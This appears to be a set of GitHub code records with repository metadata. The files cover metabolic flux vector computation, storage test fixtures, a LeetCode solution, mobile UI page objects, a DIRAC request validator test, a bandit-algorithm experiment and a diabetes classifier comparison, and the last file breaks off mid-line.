for i in range(self.nt)]),\n np.array(['lambda'])\n ])\n with open(temp_dir + '/rnames.txt', 'w') as f:\n f.write('\\t'.join(('\"{}\"'.format(name) for name in r_names)))\n\n # Metabolite Names\n m_names = np.hstack([\n np.array([m.id for m in self.model.metabolites]),\n np.array(['s{}'.format(i) for i in range(self.nt)]),\n ])\n with open(temp_dir + '/mnames.txt', 'w') as f:\n f.write('\\t'.join(('\"{}\"'.format(name) for name in m_names)))\n\n pass\n\n def read_double_out(self, out_file):\n with open(out_file, 'rb') as f:\n out_arr = np.fromstring(f.read()[13:], dtype='>d').reshape(\n (-1, self.nt + self.nr + 1)).T\n out_arr = np.asarray(out_arr, dtype=np.float64).T\n\n # Sort by the absolute value of the stoichiometry\n sort_inds= np.abs(out_arr[:, :self.nr]).sum(1).argsort()\n out_arr = out_arr[sort_inds]\n\n unbounded = out_arr[np.isclose(out_arr[:,-1], 0.)]\n bounded = out_arr[~np.isclose(out_arr[:,-1], 0.)]\n\n if bounded.size: # Test if its empty\n bounded /= np.atleast_2d(bounded[:,-1]).T\n\n unbounded_df = pd.DataFrame(\n unbounded[:, :self.nr], \n columns=[r.id for r in self.model.reactions],\n index=['UEV{}'.format(i) \n for i in range(1, unbounded.shape[0] + 1)])\n\n bounded_df = pd.DataFrame(\n bounded[:, :self.nr], \n columns=[r.id for r in self.model.reactions],\n index=('BEV{}'.format(i) \n for i in range(1, bounded.shape[0] + 1)))\n\n return unbounded_df.append(bounded_df)\n \n\ndef calculate_elementary_vectors(cobra_model, opts=None, verbose=True,\n java_args=None, extra_g=None, extra_h=None):\n \"\"\"Calculate elementary flux vectors, which capture arbitrary linear\n constraints. Approach as detailed in S. Klamt et al., PLoS Comput Biol. 13,\n e1005409–22 (2017).\n\n Augmented constraints as a hacky workaround for implementing more\n complicated constraints without using optlang.\n\n java_args: string\n Extra command-line options to pass to the java virtual machine.\n Eg. '-Xmx1g' will set the heap space to 1 GB.\n \n extra_g: (n x nr) array\n Extra entries in the constraint matrix. postive values for lower\n bounds, negative values for upper bounds\n extra_h: (n) array\n Corresponding bounds for the extra entries matrix\n\n \"\"\"\n efv_wrap = EFVWrapper(cobra_model, opts, verbose, java_args=java_args)\n efv_wrap.create_matrices(extra_g=extra_g, extra_h=extra_h)\n return efv_wrap()\n \n\ndef get_support_minimal(efvs):\n \"\"\"Return only those elementary flux vectors whose support is not a proper\n superset of another EFV\"\"\"\n \n bool_df = pd.DataFrame(np.isclose(efvs, 0),\n columns=efvs.columns, index=efvs.index)\n set_df = bool_df.apply(lambda x: set(x.index[~x]), 1)\n set_df = set_df[set_df != set()] # Drop the empty set EFV\n set_dict = set_df.to_dict() \n \n is_support_minimal = _get_support_minimal_list(set_dict)\n\n return efvs.loc[is_support_minimal]\n\n\ndef _get_support_minimal_list(set_dict):\n\n all_keys = set(set_dict.keys())\n is_support_minimal = []\n\n for this_key, val in tqdm(set_dict.items()):\n\n for key in all_keys.difference(set([this_key])):\n if val.issuperset(set_dict[key]):\n break\n else:\n is_support_minimal.append(this_key)\n\n return is_support_minimal\n","repo_name":"pstjohn/pyefm","sub_path":"pyefm/ElementaryFluxVectors.py","file_name":"ElementaryFluxVectors.py","file_ext":"py","file_size_in_byte":5857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14751075970","text":"import pytest\n\nfrom storage.kv_store import KeyValueStorage\nfrom storage.kv_store_leveldb import KeyValueStorageLeveldb\nfrom storage.kv_store_rocksdb import KeyValueStorageRocksdb\n\ndb_no = 0\n\n\n@pytest.yield_fixture(params=['rocksdb', 'leveldb'])\ndef storage(request, tdir) -> KeyValueStorage:\n global db_no\n if request.param == 'leveldb':\n db = KeyValueStorageLeveldb(tdir, 'metrics_ldb_{}'.format(db_no))\n else:\n db = KeyValueStorageRocksdb(tdir, 'metrics_rdb_{}'.format(db_no))\n db_no += 1\n yield db\n db.close()\n","repo_name":"scipsycho/MADBTC","sub_path":"Indy/indy-plenum/plenum/test/metrics/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10741240759","text":"\"\"\"\n给定一个数组 nums,编写一个函数将所有 0 移动到数组的末尾,同时保持非零元素的相对顺序。\n\n示例:\n\n输入: [0,1,0,3,12]\n输出: [1,3,12,0,0]\n说明:\n\n必须在原数组上操作,不能拷贝额外的数组。\n尽量减少操作次数。\n\"\"\"\n\n\nclass Solution:\n @staticmethod\n def moveZeros(nums) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n if not nums:\n return None\n slow = 0\n for i in range(len(nums)):\n if nums[i] != 0:\n nums[slow] = nums[i]\n slow += 1\n for i in range(slow, len(nums)):\n nums[i] = 0\n\n def moveZeros1(self, nums) -> None:\n if not nums:\n return None\n j = 0\n for i in range(len(nums)):\n if nums[i] != 0:\n if i > j:\n nums[j] = nums[i]\n nums[i] = 0\n j += 1\n","repo_name":"GeorgeDaiz/my_python","sub_path":"Leetcode/Array-Str/283.move-zeros.py","file_name":"283.move-zeros.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41648617212","text":"\"\"\"\nThis class models the first dummy page needed by the framework to start.\nURL: None\nPlease do not modify or delete this page\n\"\"\"\nimport os, sys, time\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom .Mobile_Base_Page import Mobile_Base_Page\nfrom utils.Wrapit import Wrapit\nimport conf.locators_mobile_acclerate_conf as locators\nimport conf.mobile_app_conf as app_conf\nclass TecentVideo_Mobile_Page(Mobile_Base_Page):\n app_conf = app_conf.app_tecentVIdeo\n tecentVideo_search = locators.tecentVideo_search\n tecentVideo_search_text_clear = locators.tecentVideo_search_text_clear\n tecentVideo_search_text = locators.tecentVideo_search_text\n tecentVideo_search_button = locators.tecentVideo_search_button\n tecentVideo_QYN_1 = locators.tecentVideo_QYN_1\n tecentVideo_error = locators.tecentVideo_error\n\n def start(self):\n \"Use this method to go to specific URL -- if needed\"\n print(\"start\")\n pass\n\n @Wrapit._screenshot\n def click_search_begin(self):\n try:\n # Click on real time price page button.\n result_flag = None\n if self.click_element(self.tecentVideo_search):\n result_flag = True\n else:\n result_flag = False \n\n self.conditional_write(result_flag,\n positive='click_search_begin',\n negative='Failed to click_search_begin',\n level='debug')\n\n except Exception as e:\n self.write(\"点击腾讯视频搜索框失败\") \n self.write(str(e))\n return result_flag\n \n @Wrapit._screenshot\n def input_search_text(self,text):\n # try :\n # self.click_element(self.tecentVideo_search_button)\n # except Exception as e:\n # self.write(\"腾讯视频跳过搜索框点击搜索失败\")\n # self.wait(2)\n # # self.click_element(self.tecentVideo_search_text)\n # try:\n # self.touch_tap(600,100)\n # except Exception as e:\n # self.write(\"点击X失败\")\n # self.wait(1)\n try:\n # Click on real time price page button.\n result_flag = None\n\n if self.set_text(self.tecentVideo_search_text,text):\n result_flag = True\n else:\n result_flag = False \n\n self.conditional_write(result_flag,\n positive='iqiyi input search text',\n negative='iqiyi Failed to input search text',\n level='debug')\n\n except Exception as e:\n self.write(\"输入搜索文本失败\") \n self.write(str(e))\n return result_flag\n @Wrapit._screenshot\n def click_search_button(self):\n try:\n # Click on real time price page button.\n result_flag = None\n if self.click_element(self.tecentVideo_search_button):\n result_flag = True\n else:\n result_flag = False \n\n self.conditional_write(result_flag,\n positive='腾讯视频确认搜索点击搜索按钮',\n negative='腾讯视频点击搜索按钮失败',\n level='debug')\n\n except Exception as e:\n self.write(\"腾讯视频点击搜索按钮失败\") \n self.write(str(e))\n return result_flag\n @Wrapit._screenshot\n def select_QYN_series(self):\n try:\n # Click on real time price page button.\n result_flag = None\n if self.click_element(self.tecentVideo_QYN_1):\n result_flag = True\n else:\n result_flag = False \n\n self.conditional_write(result_flag,\n positive='选择搜索结果第一集',\n negative='选择剧集失败',\n level='debug')\n\n except Exception as e:\n self.write(\"Exception while clicking on the bitcoin real time price button.\") \n self.write(str(e))\n return result_flag\n @Wrapit._screenshot\n def play_video(self,time):\n self.wait(time)\n self.write(\"腾讯视频视频播放,进行等待操作\") ","repo_name":"justtwo2/TestGen","sub_path":"qxf2-page-object-model-master/page_objects/tecentVideo_mobile_page.py","file_name":"tecentVideo_mobile_page.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5140294987","text":"\"\"\" :mod: RequestValidatorTests\n =======================\n\n .. module: RequestValidatorTests\n :synopsis: test cases for RequestValidator\n .. moduleauthor:: Krzysztof.Ciba@NOSPAMgmail.com\n\n test cases for RequestValidator\n\"\"\"\nimport unittest\nfrom unittest.mock import MagicMock as Mock, patch\n\nfrom DIRAC.RequestManagementSystem.Client.Request import Request\nfrom DIRAC.RequestManagementSystem.Client.Operation import Operation\nfrom DIRAC.RequestManagementSystem.Client.File import File\n\n# SUT\nfrom DIRAC.RequestManagementSystem.private.RequestValidator import RequestValidator\n\n\n########################################################################\nclass RequestValidatorTests(unittest.TestCase):\n \"\"\"\n .. class:: RequestValidatorTests\n\n \"\"\"\n\n def setUp(self):\n \"\"\"test setup\"\"\"\n self.request = Request()\n self.operation = Operation()\n self.file = File()\n\n def tearDown(self):\n \"\"\"test tear down\"\"\"\n del self.request\n del self.operation\n del self.file\n\n @patch(\"DIRAC.ConfigurationSystem.Client.PathFinder.getSystemInstance\", new=Mock())\n def testValidator(self):\n \"\"\"validator test\"\"\"\n\n # create validator\n validator = RequestValidator()\n self.assertEqual(isinstance(validator, RequestValidator), True)\n\n # RequestName not set\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n self.request.RequestName = \"test_request\"\n\n # # no operations\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n self.request.addOperation(self.operation)\n\n # # type not set\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n self.operation.Type = \"ReplicateAndRegister\"\n\n # # files not present\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n self.operation.addFile(self.file)\n\n # # targetSE not set\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n self.operation.TargetSE = \"CERN-USER\"\n\n # # missing LFN\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n self.file.LFN = \"/a/b/c\"\n\n # # no ownerDN\n # force no owner DN because it takes the one of the current user\n self.request.OwnerDN = \"\"\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n self.request.OwnerDN = \"foo/bar=baz\"\n\n # # no owner group\n # same, force it\n self.request.OwnerGroup = \"\"\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n self.request.OwnerGroup = \"dirac_user\"\n\n # Checksum set, ChecksumType not set\n self.file.Checksum = \"abcdef\"\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n\n # ChecksumType set, Checksum not set\n self.file.Checksum = \"\"\n self.file.ChecksumType = \"adler32\"\n\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n\n # both set\n self.file.Checksum = \"abcdef\"\n self.file.ChecksumType = \"adler32\"\n ret = validator.validate(self.request)\n self.assertEqual(ret, {\"OK\": True, \"Value\": None})\n\n # both unset\n self.file.Checksum = \"\"\n self.file.ChecksumType = None\n ret = validator.validate(self.request)\n self.assertEqual(ret, {\"OK\": True, \"Value\": None})\n\n # all OK\n ret = validator.validate(self.request)\n self.assertEqual(ret, {\"OK\": True, \"Value\": None})\n\n\n# test suite execution\nif __name__ == \"__main__\":\n gTestLoader = unittest.TestLoader()\n gSuite = gTestLoader.loadTestsFromTestCase(RequestValidatorTests)\n gSuite = unittest.TestSuite([gSuite])\n unittest.TextTestRunner(verbosity=3).run(gSuite)\n","repo_name":"hmiyake/DIRAC","sub_path":"src/DIRAC/RequestManagementSystem/private/test/Test_RequestValidator.py","file_name":"Test_RequestValidator.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"35006068498","text":"import random as r\nimport math as m\nimport matplotlib.pyplot as plt\nimport numpy as np\n# Global variables\n\nNB_LEVIERS = 5\nRECOMPENSE_MAX = 5\nNB_ITER = 1000\nEPSILON = 0.5\n\ndef jouer(machines,action):\n proba = machines[action]\n if r.random() < proba :\n return 1\n else :\n return 0\n\ndef alea(recomp,memo):\n indice = r.randint(0,len(recomp)-1)\n return indice\n\ndef greedy(recomp,memo):\n tab = [0]*len(recomp)\n for i in range(10 * len(recomp)):\n levier = alea(recomp,memo)\n tab[levier] += recomp[levier]\n\n imaxi , maxi = (0,0)\n for i in range(len(tab)):\n if tab[i] > maxi :\n maxi = tab[i]\n imaxi = i\n return imaxi\n\ndef epsgreedy(recomp,memo):\n epsilon = EPSILON\n tab = [0]*len(recomp)\n for i in range(10 * len(recomp)):\n if (r.random() < epsilon):\n levier = alea(recomp, memo)\n tab[levier] += recomp[levier]\n else :\n levier = greedy(recomp, memo)\n tab[levier] += recomp[levier]\n\n imaxi,maxi = (0,0)\n for i in range(len(tab)):\n if tab[i] > maxi :\n maxi = tab[i]\n imaxi = i\n return imaxi\n\n\ndef UCB(recomp,memo):\n nb_parties = np.sum(memo) # Nb de parties jouees\n tab = [nb_parties]*len(recomp)\n for i in range(1, 10 * len(recomp)):\n levier = alea(recomp,memo)\n if(memo[levier] != 0):\n tab[levier] = recomp[levier] + m.sqrt( 2*m.log(i) / float(memo[levier]) )\n\n imaxi,maxi = (0,0)\n for i in range(len(tab)):\n if tab[i] > maxi :\n maxi = tab[i]\n imaxi = i\n return imaxi\n\n\nLeviers = [r.random() for i in range(NB_LEVIERS)] # Tableaux de probas\nprint(Leviers)\n\n\n\"\"\" \naction = r.randint(0,len(Leviers)-1) \nprint(jouer(Leviers,action)) \n\"\"\"\n\n\nMemos = [0]*len(Leviers) # Tableau de memoire\nRecomp = [0]*len(Leviers) # Tableau de reco\n\nfor i in range(len(Leviers)):\n for k in range(10):\n Recomp[i] += jouer(Leviers,i)\n Memos[i] += 1\n Recomp[i] /= 10.0\n\nprint(Recomp)\n\n\"\"\"for i in range(0,100):\n # ind = alea(Recomp,Memos)\n ind = UCB(Recomp,Memos)\n win = jouer(Leviers,ind)\n Memos[ind] += 1\n Recomp[ind] = ( ( Recomp[ind] * (Memos[ind]-1)) + win ) / float(Memos[ind])\n\nprint(Recomp)\nprint(Memos)\n\"\"\"\n\n\n#ICI ON COMPARE NOS DIFFERENTS ALGOS ET LEURS REGRETS\n\"\"\"\nmeilleur_machine = np.argmax(Leviers) ## ON CHOISIT LA MEILLEURE ACTION\nsum_max = [0.0]*NB_ITER\n\nsum_alea = [0.0]*NB_ITER\n\nsum_greedy = [0.0]*NB_ITER\nsum_epsgreedy = [0.0]*NB_ITER\nsum_UCB = [0.0]*NB_ITER\n\nregrets_alea = [0.0]*NB_ITER\nregrets_greedy = [0.0]*NB_ITER\nregrets_epsgreedy = [0.0]*NB_ITER\nregrets_UCB = [0.0]*NB_ITER\n\nfor i in range(1,NB_ITER):\n sum_max[i] = sum_max[i-1] + jouer(Leviers,meilleur_machine)\n sum_alea[i] = sum_alea[i-1] + jouer(Leviers, alea(Recomp,Memos))\n sum_greedy[i] = sum_greedy[i-1] + jouer(Leviers,greedy(Recomp,Memos))\n sum_epsgreedy[i] = sum_epsgreedy[i-1] + jouer(Leviers,epsgreedy(Recomp,Memos))\n sum_UCB[i] = sum_UCB[i-1] + jouer(Leviers,UCB(Recomp,Memos))\n\n\n regrets_alea[i] = sum_max[i] - sum_alea[i]\n regrets_greedy[i] = sum_max[i] - sum_greedy[i]\n regrets_epsgreedy[i] = sum_max[i] - sum_epsgreedy[i]\n regrets_UCB[i] = sum_max[i] - sum_UCB[i]\n\n\n\nOn cree une IA qui choisit la machine avec la meilleure proba a chaque fois et on somme ces gains la \n\nEnsuite on fait notre programme on calcule la somme et on plot la difference de ces deux termes \n\n\n\nplt.plot(range(NB_ITER),regrets_alea, label = \"Alea\")\nplt.plot(range(NB_ITER),regrets_greedy, label = \"greedy\")\nplt.plot(range(NB_ITER),regrets_epsgreedy, label = \"eps-greedy\")\nplt.plot(range(NB_ITER),regrets_UCB, label = \"UCB\")\n\n\nplt.title(\"Comparaison des différentes approches et de leur regret respectifs \")\nplt.legend()\n\nplt.show()\n\n\"\"\"\n\n# ICI, ON VA ETUDIER COMPORTEMENT DE EPS GREEDY POUR DIFFERENTS EPS\n\"\"\"\nEPSI = [k for k in [0.0,0.3,0.5,0.75,1.0]]\n#print(\"blabla\",EPSI)\n\nmeilleur_machine = np.argmax(Leviers) ## ON CHOISIT LA MEILLEURE ACTION\nsum_max = [0.0]*NB_ITER\n\nsum_greedy = [0.0]*NB_ITER\nregret_greedy = [0.0]*NB_ITER\n\nsum_epsgreedy1 = [0.0]*NB_ITER\nsum_epsgreedy2 = [0.0]*NB_ITER\nsum_epsgreedy3 = [0.0]*NB_ITER\nsum_epsgreedy4 = [0.0]*NB_ITER\nsum_epsgreedy5 = [0.0]*NB_ITER\n\n\nregret_epsgreedy1 = [0.0]*NB_ITER\nregret_epsgreedy2 = [0.0]*NB_ITER\nregret_epsgreedy3 = [0.0]*NB_ITER\nregret_epsgreedy4 = [0.0]*NB_ITER\nregret_epsgreedy5 = [0.0]*NB_ITER\n\n\nfor i in range(1,NB_ITER):\n sum_max[i] = sum_max[i - 1] + jouer(Leviers, meilleur_machine)\n sum_greedy[i] = sum_greedy[i - 1] + jouer(Leviers, greedy(Recomp, Memos))\n regret_greedy[i] = sum_max[i] - sum_greedy[i]\n\nEPSILON = EPSI[0]\n\nfor j in range(1,NB_ITER):\n sum_epsgreedy1[j] = sum_epsgreedy1[j - 1] + jouer(Leviers, epsgreedy(Recomp, Memos))\n regret_epsgreedy1[j] = sum_max[j] - sum_epsgreedy1[j]\n\nEPSILON = EPSI[1]\n\nfor j in range(1,NB_ITER):\n sum_epsgreedy2[j] = sum_epsgreedy2[j - 1] + jouer(Leviers, epsgreedy(Recomp, Memos))\n regret_epsgreedy2[j] = sum_max[j] - sum_epsgreedy2[j]\n\n\nEPSILON = EPSI[2]\n\nfor j in range(1,NB_ITER):\n sum_epsgreedy3[j] = sum_epsgreedy3[j - 1] + jouer(Leviers, epsgreedy(Recomp, Memos))\n regret_epsgreedy3[j] = sum_max[j] - sum_epsgreedy3[j]\n\nEPSILON = EPSI[3]\n\nfor j in range(1,NB_ITER):\n sum_epsgreedy4[j] = sum_epsgreedy4[j - 1] + jouer(Leviers, epsgreedy(Recomp, Memos))\n regret_epsgreedy4[j] = sum_max[j] - sum_epsgreedy4[j]\n\nEPSILON = EPSI[4]\n\nfor j in range(1,NB_ITER):\n sum_epsgreedy5[j] = sum_epsgreedy5[j - 1] + jouer(Leviers, epsgreedy(Recomp, Memos))\n regret_epsgreedy5[j] = sum_max[j] - sum_epsgreedy5[j]\n\nplt.plot(range(NB_ITER),regret_greedy,label=\"greedy\")\nplt.plot(range(NB_ITER),regret_epsgreedy1,label=\"eps = 0 \")\nplt.plot(range(NB_ITER),regret_epsgreedy2,label=\"eps = 0.3\")\nplt.plot(range(NB_ITER),regret_epsgreedy3,label=\"eps = 0.5\")\nplt.plot(range(NB_ITER),regret_epsgreedy4,label=\"eps = 0.75\")\nplt.plot(range(NB_ITER),regret_epsgreedy5,label=\"eps = 1\")\n\nplt.legend()\n\nplt.show()\n\n\"\"\"\n\n# TEST 6 : VARIER NB LEVIERS\n\n","repo_name":"AlamHenri/Exploration-Exploitation","sub_path":"banchots.py","file_name":"banchots.py","file_ext":"py","file_size_in_byte":6286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4637036335","text":"import subprocess\r\nimport tkinter as tk\r\nimport customtkinter\r\n\r\n# Create the main window\r\nroot = customtkinter.CTk()\r\nroot.title(\"Open Program\")\r\nroot.configure(bg=\"#2a2d30\")\r\nroot.resizable(False, False)\r\ncustomtkinter.set_appearance_mode(\"Dark\")\r\n\r\n\r\ndef open_program():\r\n program_path = \"C:/Users/roelb/PycharmProjects/pythonProject2/courses.py\"\r\n try:\r\n subprocess.Popen([\"python\", program_path])\r\n except FileNotFoundError:\r\n print(\"Program file not found.\")\r\n\r\n\r\n# Create a button to open the program\r\nbutton = customtkinter.CTkButton(root, text=\"Open Program\", command=open_program)\r\nbutton.pack(padx=10, pady=10)\r\n\r\nroot.mainloop()\r\n","repo_name":"ynbyl/comsci","sub_path":"CCC151/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19606434417","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 28 18:46:56 2022\n\n@author: Sergio Gomez\n\"\"\"\nimport math, time, random, datetime\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom warnings import simplefilter\nfrom sklearn.model_selection import train_test_split \nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC \nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import linear_model\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import f1_score\n\n\nurl = 'diabetes.csv'\ndata = pd.read_csv(url)\n\n#Tratamiento de la data\n #Sabemos que hay 768 personas con una distribucion desigual\n #Tambien hay algunos valores de (0) en las tablas de 'Glucose', 'BloodPressure', 'SkinThickness', 'Insulin' y 'BMI'.\n #Los datos que estan definidos como '0' serán reemplazados por el valor promedio del grupo de datos.\n \n\n#Los datos '0' de las tablas mencionadas anteriormente han pasado a ser el valor del promedio de cada respectivo dato\n \n #El promedio de la tabla Glucose es 121, entonces los valores de 0 seran reemplazdos por 121\ndata.Glucose.replace(0, 121, inplace=True)\n \n #El promedio de la tabla BloodPressure es 69, entonces los valores de 0 seran reemplazdos por 69\ndata.BloodPressure.replace(0, 69, inplace=True)\n\n #El promedio de la tabla SkinThickness es 21, entonces los valores de 0 seran reemplazdos por 21\ndata.SkinThickness.replace(0, 21, inplace=True) \n\n #El promedio de la tabla Insulin es 80, entonces los valores de 0 seran reemplazdos por 80\ndata.Insulin.replace(0, 80, inplace=True) \n \n #El promedio de la tabla BMI es 32, entonces los valores de 0 seran reemplazdos por 32\ndata.BMI.replace(0, 32, inplace=True) \n\n \n#Partir la data en dos\n\ndata_train = data[:385]\ndata_test = data[385:]\n\nx = np.array(data_train.drop(['Outcome'], 1))\ny = np.array(data_train.Outcome) #0 no tiene diabetes, 1 si tiene diabetes\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25)\n\nx_test_out = np.array(data_test.drop(['Outcome'], 1))\ny_test_out = np.array(data_test.Outcome)\n#Regresión logística\n\n#Seleccionar un modelo\n\n\n\nkfold = KFold(n_splits=10) #Kfold se cambia a 10 splits\n\nacc_scores_train_train = []\nacc_scores_test_train = []\nlogreg = LogisticRegression(solver='lbfgs', max_iter = 7600)\n\nfor train, test in kfold.split(x, y):\n logreg.fit(x[train], y[train])\n scores_train_train = logreg.score(x[train], y[train])\n scores_test_train = logreg.score(x[test], y[test])\n acc_scores_train_train.append(scores_train_train)\n acc_scores_test_train.append(scores_test_train)\n \ny_pred = logreg.predict(x_test_out)\nprint(f'y de prediccion: {y_pred}')\nprint(f'Y real :{y_test_out}')\n\n\nprint('Regresión Logística Validación cruzada')\n\n# Accuracy de Entrenamiento de Entrenamiento\nprint(f'accuracy de Entrenamiento de Entrenamiento: {np.array(acc_scores_train_train).mean()}')\n\n# Accuracy de Test de Entrenamiento\nprint(f'accuracy de Test de Entrenamiento: {np.array(acc_scores_test_train).mean()}')\n\n# Accuracy de Validación\nprint(f'accuracy de Validación: {logreg.score(x_test_out, y_test_out)}')\n\n\n# Matriz de confusión\nprint(f'Matriz de confusión Regresion Loigistica: {confusion_matrix(y_test_out, y_pred)}')\n\nmatriz_confusion = confusion_matrix(y_test_out, y_pred)\nplt.figure(figsize = (6, 6))\nsns.heatmap(matriz_confusion)\nplt.title(\"Mariz de confución Regresion Loigistica\")\n\nprecision = precision_score(y_test_out, y_pred, average=None).mean()\nprint(f'Precisión: {precision}')\n\nrecall = recall_score(y_test_out, y_pred, average=None).mean()\nprint(f'Re-call: {recall}')\n\nf1_score_1 = f1_score(y_test_out, y_pred, average=None).mean()\n\nprint(f'f1: {f1_score_1}')\n\n\nprint('*'*50)\n\n\n\nsvc = SVC(kernel='rbf') #Se utiliza el núcleo rbf/gaussiano para adaptarse al modelo.\n\nfor train, test in kfold.split(x, y):\n svc.fit(x[train], y[train])\n scores_train_train = svc.score(x[train], y[train])\n scores_test_train = svc.score(x[test], y[test])\n acc_scores_train_train.append(scores_train_train)\n acc_scores_test_train.append(scores_test_train)\n \ny_pred = svc.predict(x_test_out)\nprint(f'y de prediccion: {y_pred}')\nprint(f'Y real :{y_test_out}')\n\n\nprint('Maquina de soporte vectorial Validación cruzada')\n\n# Accuracy de Entrenamiento de Entrenamiento\nprint(f'accuracy de Entrenamiento de Entrenamiento: {np.array(acc_scores_train_train).mean()}')\n\n# Accuracy de Test de Entrenamiento\nprint(f'accuracy de Test de Entrenamiento: {np.array(acc_scores_test_train).mean()}')\n\n# Accuracy de Validación\nprint(f'accuracy de Validación: {svc.score(x_test_out, y_test_out)}')\n\n\n# Matriz de confusión\nprint(f'Matriz de confusión SVC: {confusion_matrix(y_test_out, y_pred)}')\n\nmatriz_confusion = confusion_matrix(y_test_out, y_pred)\nplt.figure(figsize = (6, 6))\nsns.heatmap(matriz_confusion)\nplt.title(\"Mariz de confución svc\")\n\nprecision = precision_score(y_test_out, y_pred, average=None).mean()\nprint(f'Precisión: {precision}')\n\nrecall = recall_score(y_test_out, y_pred, average=None).mean()\nprint(f'Re-call: {recall}')\n\nf1_score_2 = f1_score(y_test_out, y_pred, average=None).mean()\n\nprint(f'f1: {f1_score_2}')\n\n\nprint('*'*50)\n\n\n\n\narbol = DecisionTreeClassifier(max_depth=2, random_state=42)# Se usa un árbol de profundidad 2 para que no haya overfitting\n\nfor train, test in kfold.split(x, y):\n arbol.fit(x[train], y[train])\n scores_train_train = arbol.score(x[train], y[train])\n scores_test_train = arbol.score(x[test], y[test])\n acc_scores_train_train.append(scores_train_train)\n acc_scores_test_train.append(scores_test_train)\n \ny_pred = arbol.predict(x_test_out)\nprint(f'y de prediccion: {y_pred}')\nprint(f'Y real :{y_test_out}')\n\nprint('Arbol de Desicion Validación cruzada')\n\n# Accuracy de Entrenamiento de Entrenamiento\nprint(f'accuracy de Entrenamiento de Entrenamiento: {np.array(acc_scores_train_train).mean()}')\n\n# Accuracy de Test de Entrenamiento\nprint(f'accuracy de Test de Entrenamiento: {np.array(acc_scores_test_train).mean()}')\n\n# Accuracy de Validación\nprint(f'accuracy de Validación: {arbol.score(x_test_out, y_test_out)}')\n\n\n# Matriz de confusión\nprint(f'Matriz de confusión arbol de decision: {confusion_matrix(y_test_out, y_pred)}')\n\nmatriz_confusion = confusion_matrix(y_test_out, y_pred)\nplt.figure(figsize = (6, 6))\nsns.heatmap(matriz_confusion)\nplt.title(\"Mariz de confución arbol de decision\")\n\nprecision = precision_score(y_test_out, y_pred, average=None).mean()\nprint(f'Precisión: {precision}')\n\nrecall = recall_score(y_test_out, y_pred, average=None).mean()\nprint(f'Re-call: {recall}')\n\nf1_score_3 = f1_score(y_test_out, y_pred, average=None).mean()\n\nprint(f'f1: {f1_score_3}')\n\n\nprint('*'*50)\n\n#Random Forest Classifier\n\n\n\nclf = RandomForestClassifier(max_depth=2, random_state=0)\n\nfor train, test in kfold.split(x, y):\n clf.fit(x[train], y[train])\n scores_train_train = clf.score(x[train], y[train])\n scores_test_train = clf.score(x[test], y[test])\n acc_scores_train_train.append(scores_train_train)\n acc_scores_test_train.append(scores_test_train)\n \ny_pred = clf.predict(x_test_out)\nprint(f'y de prediccion: {y_pred}')\nprint(f'Y real :{y_test_out}')\n\nprint('Arbol de Desicion Validación cruzada')\n\n# Accuracy de Entrenamiento de Entrenamiento\nprint(f'accuracy de Entrenamiento de Entrenamiento: {np.array(acc_scores_train_train).mean()}')\n\n# Accuracy de Test de Entrenamiento\nprint(f'accuracy de Test de Entrenamiento: {np.array(acc_scores_test_train).mean()}')\n\n# Accuracy de Validación\nprint(f'accuracy de Validación: {clf.score(x_test_out, y_test_out)}')\n\n\n# Matriz de confusión\nprint(f'Matriz de confusión Random Forest: {confusion_matrix(y_test_out, y_pred)}')\n\nmatriz_confusion = confusion_matrix(y_test_out, y_pred)\nplt.figure(figsize = (6, 6))\nsns.heatmap(matriz_confusion)\nplt.title(\"Mariz de confusión Random Forest\")\n\nprecision = precision_score(y_test_out, y_pred, average=None).mean()\nprint(f'Precisión: {precision}')\n\nrecall = recall_score(y_test_out, y_pred, average=None).mean()\nprint(f'Re-call: {recall}')\n\nf1_score_4 = f1_score(y_test_out, y_pred, average=None).mean()\n\nprint(f'f1: {f1_score_4}')\n\n\nprint('*'*50)\n\n\n\n#Vecino mas cercano\n\nkn = KNeighborsClassifier()\n\nfor train, test in kfold.split(x, y):\n kn.fit(x[train], y[train])\n scores_train_train = kn.score(x[train], y[train])\n scores_test_train = kn.score(x[test], y[test])\n acc_scores_train_train.append(scores_train_train)\n acc_scores_test_train.append(scores_test_train)\n \ny_pred = 